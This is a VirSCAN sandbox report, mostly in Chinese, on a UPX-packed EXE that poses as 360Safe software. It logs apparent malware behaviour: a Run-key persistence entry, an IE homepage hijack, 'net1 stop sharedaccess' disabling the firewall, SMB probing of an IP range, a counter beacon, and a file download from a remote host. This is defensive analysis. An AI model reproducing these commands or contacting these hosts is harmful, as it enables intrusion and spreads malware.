VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, VirSCAN can scan compressed files with password 'infected' or 'virus'.

Language
Server load
Server Load

File information
Safety rating:20
Behavior list
Basic Information
MD5:01834901c019f66fe9394c1d2778f30f
file type:EXE
Production company:360Safe.com
version:1.0.0.1---2, 0, 0, 1002
Shell or compiler information:PACKER:UPX V2.00-V3.00 -> Markus Oberhumer & Laszlo Molnar & John Reiser [Overlay] *
Subfile information:upx30_9adcce69dumpFile / 50d02a764440e883837df112b9e7071b / EXE
Key behavior
Behavior description:修改注册表_IE首页
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description:隐藏指定窗口
details:[Window,Class] = [C:\Program Files\IPO.hta,HTML Application Host Window Class]
Behavior description:按名称获取主机地址
details:computer
219.133.40.1
219.133.40.2
219.133.40.3
219.133.40.4
219.133.40.5
219.133.40.6
219.133.40.7
219.133.40.8
219.133.40.9
219.133.40.10
219.133.40.11
Behavior description:杀掉进程
details:TargetProcess = COIOME.EXE /F
Behavior description:停止系统服务
details:ServiceName = Windows Firewall/Internet Connection Sharing (ICS)
Behavior description:写权限映射文件
details:CiceroSharedMemDefaultS-*
Local\UrlZonesSM_Administrator
DfSharedHeap3D4550
\WINDOWS\system32\zh-cn\wshext.dll.mui
Local\!PrivacIE!SharedMem!Counter
\WINDOWS\system32\zh-cn\ieframe.dll.mui
\WINDOWS\system32\zh-cn\wshom.ocx.mui
\WINDOWS\system32\zh-cn\cscript.exe.mui
DfSharedHeap3EB0CE
DfSharedHeap3EC327
DfSharedHeap3ED4ED
DfSharedHeap3EE810
DfSharedHeap3EFC76
Behavior description:设置特殊文件夹属性
details:C:\Program Files\Common Files\sebsbvx
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:修改注册表_启动项
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\safe360
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = c:\windows\system32\mshta.exe, CmdLine = "c:\windows\system32\mshta.exe" "c:\program files\ipo.hta"
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config browser start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config lanmanserver start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config lanmanworkstation start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config lmhosts start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config rpclocator start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config ntlmssp start= auto
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start lanmanserver
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start lanmanworkstation
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start browser
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" stop sharedaccess
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start lmhosts
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start rpclocator
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start ntlmssp
Behavior description:创建进程
details:ImagePath = C:\WINDOWS\system32\mshta.exe, CmdLine = "C:\WINDOWS\system32\mshta.exe" "C:\Program Files\IPO.hta"
ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c taskkill /im coiome.exe /f
ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /im coiome.exe /f
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config Browser start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config lanmanserver start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config lanmanworkstation start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config LmHosts start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config RpcLocator start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config NtLmSsp start= auto
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start lanmanserver
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start lanmanworkstation
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start Browser
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" stop sharedaccess
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start LmHosts
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start RpcLocator
Behavior description:创建新文件进程
details:ImagePath = C:\Program Files\Common Files\sebsbvx\coiome.exe, CmdLine = "C:\Program Files\Common Files\sebsbvx\coiome.exe"
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.1 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.2 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.3 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.4 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.5 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.6 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.7 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.8 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.9 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.10 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.11 :
Behavior description:枚举进程
details:N/A
Behavior description:杀掉进程
details:TargetProcess = COIOME.EXE /F
File behavior
Behavior description:创建可执行文件
details:C:\Program Files\Common Files\sebsbvx\coiome.exe
C:\WINDOWS\Tasks\HEJg.exe
Behavior description:查找文件
details:FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\My Documents
FileName = C:\Documents and Settings\All Users
FileName = C:\Documents and Settings\All Users\Documents
FileName = C:\Documents and Settings\Administrator\桌面
FileName = C:\Documents and Settings\All Users\桌面
FileName = C:\Program Files\IPO.hta
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\mshta.exe
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
Behavior description:写权限映射文件
details:CiceroSharedMemDefaultS-*
Local\UrlZonesSM_Administrator
DfSharedHeap3D4550
\WINDOWS\system32\zh-cn\wshext.dll.mui
Local\!PrivacIE!SharedMem!Counter
\WINDOWS\system32\zh-cn\ieframe.dll.mui
\WINDOWS\system32\zh-cn\wshom.ocx.mui
\WINDOWS\system32\zh-cn\cscript.exe.mui
DfSharedHeap3EB0CE
DfSharedHeap3EC327
DfSharedHeap3ED4ED
DfSharedHeap3EE810
DfSharedHeap3EFC76
Behavior description:设置特殊文件夹属性
details:C:\Program Files\Common Files\sebsbvx
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:修改文件内容
details:C:\Program Files\IPO.hta---> Offset = 0
C:\WINDOWS\Tasks\HEJi.vbe---> Offset = 0
Behavior description:修改新生成的可执行文件
details:C:\Program Files\Common Files\sebsbvx\coiome.exe---> Offset = 90112
Network behavior
Behavior description:联网打开网址
details:InternetOpenUrlA: http://tj.qq16800.com/t/Count.asp?mac=&ver=01&t=computer hInternet = 0x00000254
Behavior description:建立到一个指定的套接字连接
details:219.133.40.1:445
219.133.40.1:135
Behavior description:下载文件
details:URLDownloadToFileW: http://j.qq16800.com/b.jpg ---> C:\WINDOWS\Fonts\oi.ini
C:\WINDOWS\Fonts\oi.ini
Behavior description:按名称获取主机地址
details:computer
219.133.40.1
219.133.40.2
219.133.40.3
219.133.40.4
219.133.40.5
219.133.40.6
219.133.40.7
219.133.40.8
219.133.40.9
219.133.40.10
219.133.40.11
Registry behavior
Behavior description:修改注册表
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\mshta.exe
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\sc.exe
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\net1.exe
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\
Behavior description:修改注册表_延迟重命名项
details:\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Session Manager\PendingFileRenameOperations
Behavior description:修改注册表_IE首页
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description:修改注册表_IE关键属性
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Search Page
\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\default_page_url
Behavior description:修改注册表_启动项
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\safe360
Other behavior
Behavior description:创建互斥体
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
SHIMLIB_LOG_MUTEX
Local\!PrivacIE!SharedMemory!Mutex
Behavior description:隐藏指定窗口
details:[Window,Class] = [C:\Program Files\IPO.hta,HTML Application Host Window Class]
Behavior description:查找指定窗口
details:NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [,]
Behavior description:启动系统服务
details:[服务已运行]: LocalSystem, Server, C:\WINDOWS\system32\svchost.exe -k netsvcs
[服务已运行]: LocalSystem, Workstation, C:\WINDOWS\system32\svchost.exe -k netsvcs
[服务已运行]: LocalSystem, Computer Browser, C:\WINDOWS\system32\svchost.exe -k netsvcs
[服务已运行]: NT AUTHORITY\LocalService, TCP/IP NetBIOS Helper, C:\WINDOWS\system32\svchost.exe -k LocalService
[服务启动成功]: NT AUTHORITY\NetworkService, Remote Procedure Call (RPC) Locator, C:\WINDOWS\system32\locator.exe
[服务启动成功]: LocalSystem, NT LM Security Support Provider, C:\WINDOWS\system32\lsass.exe
Behavior description:获取系统权限
details:SE_DEBUG_PRIVILEGE
SE_LOAD_DRIVER_PRIVILEGE
Behavior description:获取TickCount值
details:TickCount = 493265, SleepMilliseconds = 4000.
Behavior description:枚举窗口
details:N/A
Behavior description:停止系统服务
details:ServiceName = Windows Firewall/Internet Connection Sharing (ICS)
Behavior description:调用Sleep函数
details:[1]: MilliSeconds = 1000.
[2]: MilliSeconds = 1000.
[3]: MilliSeconds = 2000.
[4]: MilliSeconds = 4000.
[5]: MilliSeconds = 4000.
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
Translated by Keith Miller, United States
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号